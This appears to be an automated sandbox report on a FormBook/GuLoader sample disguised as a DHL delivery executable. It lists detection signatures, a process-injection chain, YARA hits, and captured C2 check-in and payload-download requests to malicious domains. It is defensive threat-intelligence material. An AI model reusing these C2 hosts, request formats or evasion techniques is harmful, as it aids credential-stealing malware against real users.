Analysis Report DHL-Delivery.exe

Overview

General Information

Sample Name: DHL-Delivery.exe
Analysis ID: 121908
MD5: 12ba338de35e611aef4461c94713a0ff
SHA1: 63257aadcfe91fb0556d60cb6af265851e9991d5
SHA256: f5e9a63f2238667200b4f015774742db6c4cd71cd109877249f53403da2c1da0

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64native
  • DHL-Delivery.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\DHL-Delivery.exe' MD5: 12BA338DE35E611AEF4461C94713A0FF)
    • DHL-Delivery.exe (PID: 892 cmdline: 'C:\Users\user\Desktop\DHL-Delivery.exe' MD5: 12BA338DE35E611AEF4461C94713A0FF)
      • explorer.exe (PID: 4472 cmdline: MD5: C25CF941EE6C7927C0A2AB0CB7FABE0B)
        • cmmon32.exe (PID: 6544 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: DEAA709A71519E24B72574A666A82C2D)
          • cmd.exe (PID: 936 cmdline: /c del 'C:\Users\user\Desktop\DHL-Delivery.exe' MD5: C43699F84A68608E7E57C43B7761BBB8)
            • conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
          • explorer.exe (PID: 5372 cmdline: explorer.exe MD5: C25CF941EE6C7927C0A2AB0CB7FABE0B)
        • WerFault.exe (PID: 5676 cmdline: C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464 MD5: 875E5FDA571C26F3F6F53F603150497F)
  • SearchUI.exe (PID: 6804 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: 456EC8ADD234A97E7E4DFACE9DABA5EB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
    • 0xedb8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18_RID328F | Semiautomatic generated rule - file scan copy.pdf.r11 | Florian Roth
    • 0xedb8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for domain / URL
    Source: procesotg.com, Virustotal: Detection: 6%
    Multi AV Scanner detection for submitted file
    Source: DHL-Delivery.exe, Virustotal: Detection: 34%
    Source: DHL-Delivery.exe, Metadefender: Detection: 16%
    Source: DHL-Delivery.exe, ReversingLabs: Detection: 41%
    Yara detected FormBook
    Source: Yara match, File source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File opened: C:\Windows\System32\TileDataRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File opened: C:\Windows\SYSTEM32\Windows.StateRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File opened: C:\Windows\SYSTEM32\StateRepository.Core.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File opened: C:\Windows\System32\appresolver.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File opened: C:\Windows\SYSTEM32\profext.dll
    Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4x nop then pop ebx, 10_2_00C97B02

    Networking:

    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.80:49717 -> 34.102.136.180:80
    Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.80:49717 -> 34.102.136.180:80
    Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.80:49717 -> 34.102.136.180:80
    Source: global traffic, HTTP traffic detected: GET /mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1 Host: www.evolutionhvac.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global traffic, HTTP traffic detected: GET /mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1 Host: www.officialilluminati.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: Joe Sandbox View, IP Address: 34.102.136.180
    Source: Joe Sandbox View, ASN Name: GOOGLEUS
    Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
    Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
    Source: global traffic, HTTP traffic detected: GET /bin_dIyfkt31.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: procesotg.com Cache-Control: no-cache
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown, UDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: C:\Windows\explorer.exe, Code function: 18_2_052D0782 getaddrinfo,setsockopt,recv,18_2_052D0782
    Source: SearchUI.exe, 00000019.00000003.3115508819.000001EEA3FBF000.00000004.00000001.sdmp, String found in binary or memory: www.yahoo.cn.bing. equals www.yahoo.com (Yahoo)
    Source: unknown, DNS traffic detected: queries for: procesotg.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.tnx2u.com/mph/www.groupoperationltd.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.tnx2u.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.space
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.space/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.space/mph/www.maxmaldives.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.spaceReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.com/mph/www.tnx2u.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: SearchUI.exe, 00000019.00000003.3131603518.000001EEB5F40000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
    Source: explorer.exe, 00000007.00000002.2742124576.000000000E3B0000.00000002.00000001.sdmp, cmd.exe, 0000000B.00000002.2190137433.0000000000BA0000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.2747253396.00000243B7910000.00000002.00000001.sdmpString found in binary or memory: https://aka.ms/hcsadmin
    Source: explorer.exe, 00000007.00000000.2121644383.0000000007F8F000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoft.
    Source: SearchUI.exe, 00000019.00000003.3129415140.000001EEA35B5000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/
    Source: SearchUI.exe, 00000019.00000003.2989658115.000001E6A2230000.00000004.00000001.sdmp, Init[1].htm.25.drString found in binary or memory: https://mths.be/fromcodepoint
    Source: SearchUI.exe, 00000019.00000003.3118195729.000001EEA3FF3000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comf.prototype.getAllAccountTokensi.prototype.isValidSuggestion
    Source: SearchUI.exe, 00000019.00000003.3130393716.000001EEA41D0000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
    Source: SearchUI.exe, 00000019.00000003.3116255345.000001EEA3E29000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: cmmon32.exe, 0000000A.00000002.3610263692.000000000568F000.00000004.00000001.sdmpString found in binary or memory: https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81

    E-Banking Fraud:

    Yara detected FormBook

    System Summary:

    Malicious sample detected (through community Yara rule)
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000010.00000000.2601163348.000000000198F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Potential malicious icon found
    Source: initial sample, Icon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9E8B NtClose,10_2_00CA9E8B
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9E0A NtReadFile,10_2_00CA9E0A
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9F3A NtAllocateVirtualMemory,10_2_00CA9F3A
    Source: C:\Windows\explorer.exeCode function: 18_2_052CFA32 NtCreateFile,18_2_052CFA32
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Code function: String function: 1E1343E0 appears 31 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Code function: String function: 1E122AC0 appears 37 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Code function: String function: 1E0DB1F0 appears 272 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Code function: String function: 1E134384 appears 99 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Code function: String function: 1E16C650 appears 102 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Code function: String function: 1E15BDA0 appears 96 times
    Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04CE4384 appears 97 times
    Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04C8B1F0 appears 268 times
    Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04D0BDA0 appears 96 times
    Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04D1C650 appears 102 times
    Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04CD2AC0 appears 36 times
    Source: unknown, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464
    Source: DHL-Delivery.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: DHL-Delivery.exe, 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenamePINGVINER.exe vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000000.00000002.1739181102.0000000002170000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000000.1736478550.0000000000413000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenamePINGVINER.exe vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000003.2176093284.00000000007C7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameCMMON32.exe` vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000002.2192283452.000000001DC00000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemswsock.dll.muij% vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, Binary or memory string: OriginalFilenamePINGVINER.exe vs DHL-Delivery.exe
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Section loaded: vb6zz.dll
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18, date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18, date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000010.00000000.2601163348.000000000198F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18, date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000010.00000000.2601163348.000000000198F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18, date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18, date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: classification engine, Classification label: mal100.rans.troj.spyw.evad.winEXE@10/137@6/4
    Source: C:\Windows\explorer.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001e.db
    Source: C:\Windows\System32\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4472
    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_02
    Source: C:\Windows\System32\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B4.tmp
    Source: unknown, Process created: C:\Windows\explorer.exe
    Source: DHL-Delivery.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Windows\explorer.exe, File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File read: C:\Windows\System32\drivers\etc\hosts
    Source: DHL-Delivery.exe, Virustotal: Detection: 34%
    Source: DHL-Delivery.exe, Metadefender: Detection: 16%
    Source: DHL-Delivery.exe, ReversingLabs: Detection: 41%
    Source: unknown, Process created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: unknown, Process created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe'
